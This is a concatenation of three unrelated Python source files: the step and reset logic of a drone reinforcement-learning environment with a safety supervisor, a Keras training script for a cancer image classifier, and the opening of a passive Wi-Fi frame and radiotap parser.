self.record_svm_gp = record_svm_gp
self.Crashed = 0
self.last_teacher_crash = 0
self.timeOut = 0
self.which_static = which_static
self.safe_states = safe_states
self.total_distance = 0
if supervisor == 'cbf-gp-logical' or supervisor == 'cbf-gp-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = '2k'
self.gp = initialize_gp_dynamics('2k')
if supervisor == 'cbf-gp-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = 100000
self.svm = initialize_svm_prediction_gp(num_prior_data=num_prior_data_cbf)
self.unsafe_threshold = 0.5
search_space = 'grid'
if supervisor == 'cbf-svm':
if num_prior_data_cbf is None:
num_prior_data_cbf = 2000
self.svm = initialize_svm_prediction(num_prior_data=num_prior_data_cbf)
self.unsafe_threshold = 0.6
if supervisor == 'cbf-gp-logical':
self.unsafe_threshold = 0.85
search_space = 'random'
self.cbf_quadratic = cbf_quadratic
if search_space == 'grid':
space = Space([(-1., 1.), (-1., 1.)])
grid = Grid(border="include", use_full_layout=False)
action_manipulated = grid.generate(space.dimensions, 160)
action_manipulated = np.array(action_manipulated)
action_manipulated2 = \
np.append(action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] < -0.3), :],
action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] > 0.3), :],
axis=0)
action_manipulated2 = \
np.append(action_manipulated2,
action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] < -0.3), :],
axis=0)
action_manipulated2 = \
np.append(action_manipulated2,
action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] > 0.3), :],
axis=0)
self.action_manipulated = action_manipulated2
if search_space == 'random':
self.action_manipulated = np.array([[-0.1, 0],
[0.1, 0],
[0, 0.1],
[0, -0.1],
[-0.25, 0],
[0.25, 0],
[0, 0.25],
[0, -0.25],
[-0.1, 0.1],
[0.1, 0.1],
[-0.1, -0.1],
[0.1, -0.1],
[-0.25, 0.25],
[0.25, 0.25],
[-0.25, -0.25],
[0.25, -0.25], ###############
[0.1, 0.05],
[0.05, 0.1],
[0.05, -0.1],
[-0.25, 0.1],
[0.25, 0.8],
[0.6, 0.25],
[0.3, -0.25],
[-0.1, 0.7],
[0.9, 0.1],
[-0.1, -1],
[1, -0.1],
[-0.2, 0.75],
[0.5, 0.5],
[-0.5, -0.5],
[0.75, 0],
[0.15, 0.05],
[0.6, 0.1],
[0.4, -0.1],
[-0.25, 0.15],
[0.25, 0.9],
[-0.35, 0.25],
[0.5, -0.25],
[-0.19, 0.19],
[1, 1],
[-1, -1],
[0, 1],
[-1, 0],
[0.2, 0.75],
[-0.8, 0],
[0, -0.58]])
self.cbf_learn_online = cbf_learn_online
self.TotalCollisions = []
self.filename = filename
self.observation_storage = []
self.safe_info = safe_info
self.csv_writer_lock = threading.Lock()
self.coordinates_static_obstacles = coordinates_static_obstacles
self.rewards = rewards
# reward shaping
if self.rewards is not None:
self.reward_reached_target = self.rewards[0]
self.reward_distance = self.rewards[1]
self.reward_crashed = self.rewards[2]
if self.supervisor == "logical":
self.reward_logical = self.rewards[3]
if self.supervisor == "cbf-gp-logical" or self.supervisor == "cbf-svm" or self.supervisor == "cbf-gp-svm":
self.reward_cbf = self.rewards[3]
# default reward settings
if self.rewards is None:
self.reward_reached_target = 150
self.reward_distance = 1.5
self.reward_crashed = 150
self.reward_cbf = 0.5
self.reward_logical = 100
# add extra static obstacles as boundary of the garden
self.extra_obstacles = np.array([[-2.5, -.15],
[-2.5, -.35],
[-2.5, -.55],
[-2.5, -.75],
[-2.5, -.95],
[-2.5, -1.15],
[-2.5, -1.35],
[-2.5, -1.55],
[-2.5, -1.75],
[-2.5, -1.95],
[-2.5, -2.15],
[-2.5, -2.35],
[-2.5, -2.55],
[-2.5, -2.75],
[-2.5, -2.95],
[-2.5, -3.15],
[-2.5, -3.35],
[2.55, -.25],
[2.55, -.35],
[2.55, -.55],
[2.55, -.75],
[2.55, -.95],
[2.55, -1.15],
[2.55, -1.35],
[2.55, -1.55],
[2.55, -1.75],
[2.55, -1.95],
[2.55, -2.15],
[2.55, -2.35],
[2.55, -2.55],
[2.55, -2.75],
[2.55, -2.95],
[2.55, -3.15],
[2.55, -3.35],
[-2.50, -0.15],
[-2.30, -0.15],
[-2.10, -0.15],
[-1.90, -0.15],
[-1.70, -0.15],
[-1.50, -0.15],
[-1.30, -0.15],
[-1.10, -0.15],
[-.90, -0.15],
[-.70, -0.15],
[-.5, -0.15],
[-.3, -0.15],
[-.1, -0.15],
[0.7, -0.15],
[0.9, -0.15],
[1.1, -0.15],
[1.3, -0.15],
[1.5, -0.15],
[1.7, -0.15],
[1.9, -0.15],
[2.1, -0.15],
[2.3, -0.15],
[2.5, -0.15],
[-2.40, -3.4],
[-2.20, -3.4],
[-2.00, -3.4],
[-1.90, -3.4],
[-1.70, -3.4],
[-1.50, -3.4],
[-1.30, -3.4],
[-1.10, -3.4],
[-.90, -3.4],
[-.70, -3.4],
[-.50, -3.4],
[-.3, -3.4],
[-.1, -3.4],
[0.1, -3.4],
[0.3, -3.4],
[0.5, -3.4],
[0.7, -3.4],
[0.9, -3.4],
[1.1, -3.4],
[1.3, -3.4],
[1.5, -3.4],
[1.7, -3.4],
[1.9, -3.4],
[2.1, -3.4],
[2.3, -3.4],
[2.5, -3.4],
])
# add extra obstacles as tress in the middle of the garden
self.extra_obstacles = np.concatenate((self.extra_obstacles, self.coordinates_static_obstacles))
def step(self, action):
"""
Get information for the next RL step
Parameters:
action (float, float): Action vector (speed)
Returns:
[float]: Observation vector
float: reward value
observation, reward, done, info
"""
reward = 0
# check if env needs reset
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
# pass proposed action to the CBF (if CBF is active) and return the manipulated or the proposed action
if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-svm' or self.supervisor == 'cbf-gp-svm':
index = int(len(self.observation_storage) - 1)
old_observation = self.observation_storage[index]
if self.cbf_learn_online is True:
if len(self.observation_storage) > 2:
state_x = self.observation_storage[index - 1]
state_x = state_x[0:self.lidar_num_bins]
state_x = np.asarray(state_x)
action_x = self.observation_storage[index]
action_x = action_x[28:30]
action_x = np.asarray(action_x)
state_action_x = np.append(state_x, action_x)
state_action_x = state_action_x.reshape(1, -1)
state_y = self.observation_storage[index]
state_y = state_y[26]
if state_y > 0:
state_y = int(1)
else:
state_y = int(-1)
state_y = np.asarray(state_y)
state_y = state_y.reshape(1, -1)
self.svm.fit(state_action_x, state_y)
change_proposed_action = False
if self.supervisor == 'cbf-gp-svm' or self.supervisor == 'cbf-gp-logical':
successor_state_worst = predict_successor_state_gp(self.gp,
observation=old_observation[0:self.lidar_num_bins],
action=action)
if self.supervisor == 'cbf-gp-svm':
successor_state_worst = np.sort(successor_state_worst)
successor_state_worst = successor_state_worst.reshape(1, -1)
probability = self.svm.predict_proba(successor_state_worst)
unsafe_probability = probability[0, 1]
# print(unsafe_probability)
if unsafe_probability > self.unsafe_threshold:
change_proposed_action = True
if self.supervisor == 'cbf-gp-logical':
change_proposed_action = max(successor_state_worst[0]) > self.unsafe_threshold
if self.supervisor == 'cbf-svm':
# hier nur svm predicten
state_action = np.concatenate((old_observation[0:self.lidar_num_bins], action), axis=0)
state_action = state_action.reshape(1, -1)
probability = self.svm.predict_proba(state_action)
unsafe = probability[0, 1]
if unsafe > self.unsafe_threshold:
change_proposed_action = True
if change_proposed_action:
if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-gp-svm':
successor_state_worst_manipulated = []
manipulated = predict_successor_state_gp(self.gp,
observation=old_observation[0:self.lidar_num_bins],
action=self.action_manipulated)
if self.supervisor == 'cbf-gp-logical':
successor_state_worst_manipulated = np.amax(manipulated, axis=1)
if self.supervisor == 'cbf-gp-svm':
manipulated = np.sort(manipulated, axis=1)
probability = self.svm.predict_proba(manipulated)
successor_state_worst_manipulated = probability[:, 1]
if not self.cbf_quadratic:
index = np.argmin(successor_state_worst_manipulated)
distance_org = np.sqrt((self.action_manipulated[index, 0] - action[0]) ** 2 +
(self.action_manipulated[index, 1] - action[1]) ** 2)
self.total_distance += distance_org
action = self.action_manipulated[index]
if self.scale_reward:
reward -= self.reward_cbf * (distance_org / 2.8)
self.total_distance += distance_org
if self.cbf_quadratic:
if int(sum(successor_state_worst_manipulated < self.unsafe_threshold)) > 0.1:
safety_actions = self.action_manipulated[successor_state_worst_manipulated < self.unsafe_threshold]
else:
safety_actions = self.action_manipulated
distance_org = np.sqrt((safety_actions[:, 0] - action[0]) ** 2 +
(safety_actions[:, 1] - action[1]) ** 2)
index = min(enumerate(distance_org), key=itemgetter(1))[0]
action = safety_actions[index]
if self.scale_reward:
reward -= self.reward_cbf * (distance_org[index] / 2.8)
self.total_distance += distance_org[index]
#if self.supervisor == 'cbf-svm':
# successor_state_unsafe_prob_manipulated = []
# for j in range(0, len(self.action_manipulated)):
# state_action = np.concatenate((old_observation[0:self.lidar_num_bins],
# self.action_manipulated[j]), axis=0)
# state_action = state_action.reshape(1, -1)
# probability = self.svm.predict_proba(state_action)
# unsafe = probability[0, 1]
# successor_state_unsafe_prob_manipulated.append(unsafe)
# index = np.argmin(successor_state_unsafe_prob_manipulated)
# action = self.action_manipulated[index]
self.last_teacher_crash = 1
self.Intervention += 1
self.Supervised = 1
if not self.scale_reward:
reward -= self.reward_cbf
# step env
observation, reward_unity, done, info = self.env.step(action)
# manipulate reward with distance to target. maximum distance is ~5.
reward -= (observation[0] / 5) * self.reward_distance
# save org ibm obs
org_observation = observation
# check if safely done
if done:
self.SafelyDone += 1
reward += self.reward_reached_target
# compute distances to obstacles
distance = distance_from_obstacles(self, observation)
# check if drone crashed
if not done:
if np.min(distance) <= .2:
self.Crashed += 1
reward -= self.reward_crashed
done = True
# check if logical supervisor is active
if not done:
if self.supervisor == 'logical':
if not self.record_svm_gp:
if np.min(distance) <= (self.safety_distance + np.random.rand(1) / 25):
self.Supervised += 1
self.Intervention += 1
done = True
reward -= self.reward_logical
# the following is used when recording data
if self.record_svm_gp:
if np.min(distance) <= 0.29 + np.random.rand(1) / 25:
self.Supervised += 1
self.Intervention += 1
done = True
reward -= self.reward_logical
else:
if np.min(distance) <= 0.35 + np.random.rand(1) / 25:
self.Supervised += 1
# append reward
self.rewards.append(reward)
# and didnt end safely
if len(self.rewards) == 120:
if not done:
done = True
self.timeOut += 1
# transform observation to lidar like observation
observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None,
lidar_alias=True, lidar_exp_gain=1.0, distance=distance)
# append supervisor and save current observation to the storage
# first self.lidar_num_bins entries of the observation storage correspond to the lidar
# the next entry is the supervised indicator
# the next entry is the done indicator
# the last 23 entries correspond to the original oracle observation by IBM
observation_storage = np.append(observation, self.Supervised)
observation_storage = np.append(observation_storage, self.which_static)
observation_storage = np.append(observation_storage, self.Intervention)
observation_storage = np.append(observation_storage, self.Crashed)
observation_storage = np.append(observation_storage, done)
observation_storage = np.append(observation_storage, action)
observation_storage = np.append(observation_storage, org_observation)
self.observation_storage.append(observation_storage)
# append the observations of time step t-1 and t-2 to the observation of time step t
# when resetting the env the observations of time step t-1 and t-2 are np.zeros()
# in time step 1 the observation of time step t-2 are np.zeros()
if len(self.rewards) == 1:
observation = np.concatenate((observation, self.observation_storage[0][0:(self.lidar_num_bins + 8)]),
axis=0)
observation_dummy = np.zeros(self.lidar_num_bins + 8)
observation = np.concatenate((observation, observation_dummy), axis=0)
if len(self.rewards) > 1:
observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 2
][0:(self.lidar_num_bins + 8)]), axis=0)
observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 1
][0:(self.lidar_num_bins + 8)]), axis=0)
if done:
self.needs_reset = True
ep_rew = sum(self.rewards)
eplen = len(self.rewards)
if self.Crashed is True and self.last_teacher_crash == 1:
teacher_failed = 1
else:
teacher_failed = 0
ep_info = [round(ep_rew, 6), eplen, self.Crashed, self.Supervised, self.Intervention, self.SafelyDone,
self.timeOut, round(time.time(), 6), teacher_failed, self.total_distance]
self.episode_rewards.append(ep_rew)
self.episode_lengths.append(eplen)
self.episode_times.append(time.time() - self.t_start)
info['episode'] = ep_info
if self.safe_states: # and self.Crashed > 0:####################################################
with open(self.filename + 'states.csv', 'a', newline='') as f:
writer = csv.writer(f)
with self.csv_writer_lock:
writer.writerows(self.observation_storage)
if self.safe_info:
with open(self.filename + 'monitor.csv', 'a', newline='') as f:
writer = csv.writer(f)
with self.csv_writer_lock:
writer.writerow(ep_info)
self.TotalCollisions.append(self.Supervised)
self.Supervised = 0
self.SafelyDone = 0
self.Intervention = 0
self.Crashed = 0
self.total_distance = 0
self.timeOut = 0
self.rewards = []
self.observation_storage = []
if not done:
if self.supervisor == 'logical' and self.record_svm_gp:
self.Supervised = 0
self.last_teacher_crash = 0
self.total_steps += 1
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
org_observation = observation
distance = distance_from_obstacles(self, observation)
while np.min(distance) < .35:
observation = self.env.reset(**kwargs)
org_observation = observation
distance = distance_from_obstacles(self, observation)
if np.min(distance) < .35:
self.needs_reset = True
if np.min(distance) >= .35:
self.needs_reset = False
self.rewards = []
observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None,
lidar_alias=True, lidar_exp_gain=1.0, distance=distance)
# append supervisor and save current observation to the storage
supervised = False
observation_storage = np.append(observation, supervised)
observation_storage = np.append(observation_storage, self.which_static)
intervention = np.array([0])
observation_storage = np.append(observation_storage, intervention)
crash_dummy = np.array([0])
observation_storage = np.append(observation_storage, crash_dummy)
done = False
observation_storage = np.append(observation_storage, done)
action_dummy = np.array([0, 0])
observation_storage = np.append(observation_storage, action_dummy)
observation_storage = np.append(observation_storage, org_observation)
self.observation_storage.append(observation_storage)
observation_dummy = np.zeros(self.lidar_num_bins + 8)
observation = np.concatenate((observation, observation_dummy), axis=0)
observation = np.concatenate((observation, observation_dummy), axis=0)
return observation
|
py | 1a3f89376a81097616e8d4ff862c491426e06045 |
import matplotlib
matplotlib.use("Agg")
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adagrad
from keras.utils import np_utils
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
import net
from configuration import config
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import argparse
import os
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--plot", type=str, default="plot.png",
help="path to output loss/accuracy plot")
args = vars(ap.parse_args())
NUM_EPOCHS = 20
INIT_LR = 1e-2
BS = 64
trainPaths = list(paths.list_images(config.TRAIN_PATH))
totalTrain = len(trainPaths)
totalVal = len(list(paths.list_images(config.VAL_PATH)))
totalTest = len(list(paths.list_images(config.TEST_PATH)))
trainLabels = [int(p.split(os.path.sep)[-2]) for p in trainPaths]
trainLabels = np_utils.to_categorical(trainLabels)
classTotals = trainLabels.sum(axis=0)
classWeight = classTotals.max() / classTotals
trainAug = ImageDataGenerator(
rescale=1 / 255.0,
rotation_range=20,
zoom_range=0.05,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.05,
horizontal_flip=True,
vertical_flip=True,
fill_mode="nearest")
valAug = ImageDataGenerator(rescale=1 / 255.0)
trainGen = trainAug.flow_from_directory(
config.TRAIN_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=True,
batch_size=BS)
valGen = valAug.flow_from_directory(
config.VAL_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=False,
batch_size=BS)
testGen = valAug.flow_from_directory(
config.TEST_PATH,
class_mode="categorical",
target_size=(48, 48),
color_mode="rgb",
shuffle=False,
batch_size=BS)
model = CancerNet.build(width=48, height=48, depth=3,
classes=2)
opt = Adagrad(lr=INIT_LR, decay=INIT_LR / NUM_EPOCHS)
model.compile(loss="binary_crossentropy", optimizer=opt,
metrics=["accuracy"])
H = model.fit_generator(
trainGen,
steps_per_epoch=totalTrain // BS,
validation_data=valGen,
validation_steps=totalVal // BS,
class_weight=classWeight,
epochs=NUM_EPOCHS)
print("[INFO] evaluating network...")
testGen.reset()
predIdxs = model.predict_generator(testGen,
steps=(totalTest // BS) + 1)
predIdxs = np.argmax(predIdxs, axis=1)
print(classification_report(testGen.classes, predIdxs,
target_names=testGen.class_indices.keys()))
cm = confusion_matrix(testGen.classes, predIdxs)
total = sum(sum(cm))
acc = (cm[0, 0] + cm[1, 1]) / total
sensitivity = cm[0, 0] / (cm[0, 0] + cm[0, 1])
specificity = cm[1, 1] / (cm[1, 0] + cm[1, 1])
print(cm)
print("acc: {:.4f}".format(acc))
print("sensitivity: {:.4f}".format(sensitivity))
print("specificity: {:.4f}".format(specificity))
model.save('cancer.model')
N = NUM_EPOCHS
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy on Dataset")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig(args["plot"])
|
py | 1a3f89539450fe4845ccff128b18bf331c7d1368 | #!/usr/bin/python
"""
Wi-Fi protocol definitions
current supports for packets below
Management
-Probe Request
-Probe Response
-Beacon
Control
-RTS
-CTS
-Block Acknowledgement
Data
-QoS Data
Also have Radiotap support
http://www.radiotap.org/defined-fields
"""
import ctypes
import struct
import logging
import operator
import collections
# wlan.fc.type
_CATEGORIES_ = {0: 'management', 1: 'control', 2: 'data'}
_SUBTYPES_ = {}
# wlan.fc.type_subtype
_SUBTYPES_[0] = {
0: 'Association Request',
1: 'Association Response',
2: 'Reassociation Request',
3: 'Reassociation Response',
4: 'Probe Request',
5: 'Probe Response',
8: 'Beacon',
9: 'ATIM',
10: 'Disassociation',
11: 'Authentication',
12: 'Deauthentication',
13: 'Action',
14: 'Action No ACK'
}
_SUBTYPES_[1] = {
5: 'VHT NDP Announcement',
7: 'Control Wrapper',
8: 'BAR',
9: 'BACK',
10: 'PS-POLL',
11: 'RTS',
12: 'CTS',
13: 'ACK',
14: 'CF-end',
15: 'CF-end + CF-ack'
}
_SUBTYPES_[2] = {
0: 'Data',
1: 'Data + CF-ack',
2: 'Data + CF-poll',
3: 'Data+CF-ack+CF-poll',
4: 'Null',
5: 'CF-ack',
6: 'CF-poll',
7: 'CF-ack+CF-poll',
8: 'QoS data',
9: 'QoS data + CF-ack',
10: 'QoS data + CF-poll',
11: 'QoS data + CF-ack + CF-poll',
12: 'QoS Null',
13: 'Reserved',
14: 'Qos + CF-poll(no data)',
15: 'Qos + CF-ack(no data)'
}
# wlan_mgt.tag
MNGMT_TAGS = {
0: "TAG_SSID",
1: "TAG_SUPP_RATES",
2: "TAG_FH_PARAMETER",
3: "TAG_DS_PARAMETER",
4: "TAG_CF_PARAMETER",
5: "TAG_TIM",
6: "TAG_IBSS_PARAMETER",
7: "TAG_COUNTRY_INFO",
8: "TAG_FH_HOPPING_PARAMETER",
9: "TAG_FH_HOPPING_TABLE",
10: "TAG_REQUEST",
11: "TAG_QBSS_LOAD",
12: "TAG_EDCA_PARAM_SET",
13: "TAG_TSPEC",
14: "TAG_TCLAS",
15: "TAG_SCHEDULE",
16: "TAG_CHALLENGE_TEXT",
32: "TAG_POWER_CONSTRAINT",
33: "TAG_POWER_CAPABILITY",
34: "TAG_TPC_REQUEST",
35: "TAG_TPC_REPORT",
36: "TAG_SUPPORTED_CHANNELS",
37: "TAG_CHANNEL_SWITCH_ANN",
38: "TAG_MEASURE_REQ",
39: "TAG_MEASURE_REP",
40: "TAG_QUIET",
41: "TAG_IBSS_DFS",
42: "TAG_ERP_INFO",
43: "TAG_TS_DELAY",
44: "TAG_TCLAS_PROCESS",
45: "TAG_HT_CAPABILITY",
46: "TAG_QOS_CAPABILITY",
47: "TAG_ERP_INFO_OLD",
48: "TAG_RSN_IE",
50: "TAG_EXT_SUPP_RATES",
51: "TAG_AP_CHANNEL_REPORT",
52: "TAG_NEIGHBOR_REPORT",
53: "TAG_RCPI",
54: "TAG_MOBILITY_DOMAIN",
55: "TAG_FAST_BSS_TRANSITION",
56: "TAG_TIMEOUT_INTERVAL",
57: "TAG_RIC_DATA",
58: "TAG_DSE_REG_LOCATION",
59: "TAG_SUPPORTED_OPERATING_CLASSES",
60: "TAG_EXTENDED_CHANNEL_SWITCH_ANNOUNCEMENT",
61: "TAG_HT_INFO",
62: "TAG_SECONDARY_CHANNEL_OFFSET",
63: "TAG_BSS_AVG_ACCESS_DELAY",
64: "TAG_ANTENNA",
65: "TAG_RSNI",
66: "TAG_MEASURE_PILOT_TRANS",
67: "TAG_BSS_AVB_ADM_CAPACITY",
68: "TAG_BSS_AC_ACCESS_DELAY",
69: "TAG_TIME_ADV",
70: "TAG_RM_ENABLED_CAPABILITY",
71: "TAG_MULTIPLE_BSSID",
72: "TAG_20_40_BSS_CO_EX",
73: "TAG_20_40_BSS_INTOL_CH_REP",
74: "TAG_OVERLAP_BSS_SCAN_PAR",
75: "TAG_RIC_DESCRIPTOR",
76: "TAG_MMIE",
78: "TAG_EVENT_REQUEST",
79: "TAG_EVENT_REPORT",
80: "TAG_DIAGNOSTIC_REQUEST",
81: "TAG_DIAGNOSTIC_REPORT",
82: "TAG_LOCATION_PARAMETERS",
83: "TAG_NO_BSSID_CAPABILITY",
84: "TAG_SSID_LIST",
85: "TAG_MULTIPLE_BSSID_INDEX",
86: "TAG_FMS_DESCRIPTOR",
87: "TAG_FMS_REQUEST",
88: "TAG_FMS_RESPONSE",
89: "TAG_QOS_TRAFFIC_CAPABILITY",
90: "TAG_BSS_MAX_IDLE_PERIOD",
91: "TAG_TFS_REQUEST",
92: "TAG_TFS_RESPONSE",
93: "TAG_WNM_SLEEP_MODE",
94: "TAG_TIM_BROADCAST_REQUEST",
95: "TAG_TIM_BROADCAST_RESPONSE",
96: "TAG_COLLOCATED_INTER_REPORT",
97: "TAG_CHANNEL_USAGE",
98: "TAG_TIME_ZONE",
99: "TAG_DMS_REQUEST",
100: "TAG_DMS_RESPONSE",
101: "TAG_LINK_IDENTIFIER",
102: "TAG_WAKEUP_SCHEDULE",
104: "TAG_CHANNEL_SWITCH_TIMING",
105: "TAG_PTI_CONTROL",
106: "TAG_PU_BUFFER_STATUS",
107: "TAG_INTERWORKING",
108: "TAG_ADVERTISEMENT_PROTOCOL",
109: "TAG_EXPIDITED_BANDWIDTH_REQ",
110: "TAG_QOS_MAP_SET",
111: "TAG_ROAMING_CONSORTIUM",
112: "TAG_EMERGENCY_ALERT_ID",
113: "TAG_MESH_CONFIGURATION",
114: "TAG_MESH_ID",
115: "TAG_MESH_LINK_METRIC_REPORT",
116: "TAG_CONGESTION_NOTIFICATION",
117: "TAG_MESH_PEERING_MGMT",
118: "TAG_MESH_CHANNEL_SWITCH",
119: "TAG_MESH_AWAKE_WINDOW",
120: "TAG_BEACON_TIMING",
121: "TAG_MCCAOP_SETUP_REQUEST",
122: "TAG_MCCAOP_SETUP_REPLY",
123: "TAG_MCCAOP_ADVERTISEMENT",
124: "TAG_MCCAOP_TEARDOWN",
125: "TAG_GANN",
126: "TAG_RANN",
127: "TAG_EXTENDED_CAPABILITIES",
128: "TAG_AGERE_PROPRIETARY",
130: "TAG_MESH_PREQ",
131: "TAG_MESH_PREP",
132: "TAG_MESH_PERR",
133: "TAG_CISCO_CCX1_CKIP",
136: "TAG_CISCO_CCX2",
137: "TAG_PXU",
138: "TAG_PXUC",
139: "TAG_AUTH_MESH_PEERING_EXCH",
140: "TAG_MIC",
141: "TAG_DESTINATION_URI",
142: "TAG_U_APSD_COEX",
143: "TAG_WAKEUP_SCHEDULE_AD",
144: "TAG_EXTENDED_SCHEDULE",
145: "TAG_STA_AVAILABILITY",
146: "TAG_DMG_TSPEC",
147: "TAG_NEXT_DMG_ATI",
148: "TAG_DMG_CAPABILITIES",
149: "TAG_CISCO_CCX3",
150: "TAG_CISCO_VENDOR_SPECIFIC",
151: "TAG_DMG_OPERATION",
152: "TAG_DMG_BSS_PRAMTER_CHANGE",
153: "TAG_DMG_BEAM_REFINEMENT",
154: "TAG_CHANNEL_MEASURMENT_FB",
157: "TAG_AWAKE_WINDOW",
158: "TAG_MULTI_BAND",
159: "TAG_ADDBA_EXT",
160: "TAG_NEXTPCP_LIST",
161: "TAG_PCP_HANDOVER",
162: "TAG_DMG_LINK_MARGIN",
163: "TAG_SWITCHING_STREAM",
164: "TAG_SESSION_TRANSMISSION",
165: "TAG_DYN_TONE_PAIR_REP",
166: "TAG_CLUSTER_REP",
167: "TAG_RELAY_CAPABILITIES",
168: "TAG_RELAY_TRANSFER_PARAM",
169: "TAG_BEAMLINK_MAINTAINCE",
170: "TAG_MULTIPLE_MAC_SUBLAYERS",
171: "TAG_U_PID",
172: "TAG_DMG_LINK_ADAPTION_ACK",
173: "TAG_SYMBOL_PROPRIETARY",
174: "TAG_MCCAOP_ADVERTISEMENT_OV",
175: "TAG_QUIET_PERIOD_REQ",
177: "TAG_QUIET_PERIOD_RES",
182: "TAG_ECPAC_POLICY",
183: "TAG_CLUSTER_TIME_OFFSET",
190: "TAG_ANTENNA_SECTOR_ID",
191: "TAG_VHT_CAPABILITY",
192: "TAG_VHT_OPERATION",
193: "TAG_EXT_BSS_LOAD",
194: "TAG_WIDE_BW_CHANNEL_SWITCH",
195: "TAG_VHT_TX_PWR_ENVELOPE",
196: "TAG_CHANNEL_SWITCH_WRAPPER",
199: "TAG_OPERATING_MODE_NOTIFICATION",
221: "TAG_VENDOR_SPECIFIC_IE"
}
def WIFI(frame, no_rtap=False):
"""calls wifi packet discriminator and constructor.
:frame: ctypes.Structure
:no_rtap: Bool
:return: packet object in success
:return: int
-1 on known error
:return: int
-2 on unknown error
"""
pack = None
try:
pack = WiHelper.get_wifi_packet(frame, no_rtap)
except Exception as e:
logging.exception(e)
return pack
class WiHelper:
"""Wi-Fi packet discriminator class.
Identifies type and subtype of packet, then trigs
packet object creation.
"""
@staticmethod
def get_wifi_packet(frame, no_rtap=False):
"""Discriminates Wi-Fi packet and creates
packet object.
:frame: ctypes.Structure
:no_rtap: Bool
:return: obj
Wi-Fi packet
"""
_, packet = WiHelper._strip_rtap(frame)
frame_control = struct.unpack('BB', packet[:2])
cat = (frame_control[0] >> 2) & 0b0011
s_type = frame_control[0] >> 4
if cat not in _CATEGORIES_.keys():
logging.warning("unknown category: %d" % (cat))
return Unknown(frame, no_rtap)
if s_type not in _SUBTYPES_[cat].keys():
logging.warning("unknown subtype %d in %s category" % (s_type, _CATEGORIES_[cat]))
return Unknown(frame, no_rtap)
if cat == 0:
if s_type == 4:
return ProbeReq(frame, no_rtap)
elif s_type == 5:
return ProbeResp(frame, no_rtap)
elif s_type == 8:
return Beacon(frame, no_rtap)
else:
return Management(frame, no_rtap)
elif cat == 1:
if s_type == 11:
return RTS(frame, no_rtap)
elif s_type == 12:
return CTS(frame, no_rtap)
elif s_type == 9:
return BACK(frame, no_rtap)
else:
return Control(frame, no_rtap)
elif cat == 2:
if s_type == 8:
return QosData(frame, no_rtap, parse_amsdu=True)
else:
return Data(frame, no_rtap)
@staticmethod
def _strip_rtap(frame):
"""strip injected radiotap header.
:return: ctypes.Structure
radiotap header
:return: ctypes.Structure
actual layer 2 Wi-Fi payload
"""
rtap_len = WiHelper.__get_rtap_len(frame)
rtap = frame[:rtap_len]
packet = frame[rtap_len:]
return rtap, packet
@staticmethod
def __get_rtap_len(frame):
"""parse length of radiotap header.
:packet: ctypes.structure
:return: int
"""
r_len = struct.unpack('H', frame[2:4])
return r_len[0]
class Radiotap(ctypes.Structure):
"""Radiotap Header Parser Class.
Radiotap headers summarize physical layer parameters
of Wi-Fi packet, such as MCS(modulation and coding scheme),
NSS(number of spatial streams), BW(bandwidth) for all common
protocol types(802.11a, 802.11n, 802.11ac etc.)
see -> http://www.radiotap.org/defined-fields
see -> https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-ieee80211-radiotap-defs.h
"""
_rfields_ = [('vers', ctypes.c_uint8),
('pad', ctypes.c_uint8),
('len', ctypes.c_uint16),
('present.tsft', ctypes.c_bool),
('present.flags', ctypes.c_bool),
('present.rate', ctypes.c_bool),
('present.channel', ctypes.c_bool),
('present.fhss', ctypes.c_bool),
('present.dbm_antsignal', ctypes.c_bool),
('present.dbm_antnoise', ctypes.c_bool),
('present.lock_quality', ctypes.c_bool),
('present.tx_attenuation', ctypes.c_bool),
('present.db_tx_attenuation', ctypes.c_bool),
('present.dbm_tx_power', ctypes.c_bool),
('present.antenna', ctypes.c_bool),
('present.db_antsignal', ctypes.c_bool),
('present.db_antnoise', ctypes.c_bool),
('present.rxflags', ctypes.c_bool),
('present.txflags', ctypes.c_bool),
('present.rts_retries', ctypes.c_bool),
('present.data_retries', ctypes.c_bool),
('present.xchannel', ctypes.c_bool),
('present.mcs', ctypes.c_bool),
('present.ampdu', ctypes.c_bool),
('present.vht', ctypes.c_bool),
('present.rtap_ns', ctypes.c_bool),
('present.ven_ns', ctypes.c_bool),
('present.ext', ctypes.c_bool),
('mactime', ctypes.c_uint64),
('flags.cfp', ctypes.c_bool),
('flags.preamble', ctypes.c_bool),
('flags.wep', ctypes.c_bool),
('flags.fragmentation', ctypes.c_bool),
('flags.fcs', ctypes.c_bool),
('flags.datapad', ctypes.c_bool),
('flags.badfcs', ctypes.c_bool),
('flags.shortgi', ctypes.c_bool),
('rate', ctypes.c_uint),
('chan.freq', ctypes.c_uint),
('chan.turbo', ctypes.c_bool),
('chan.cck', ctypes.c_bool),
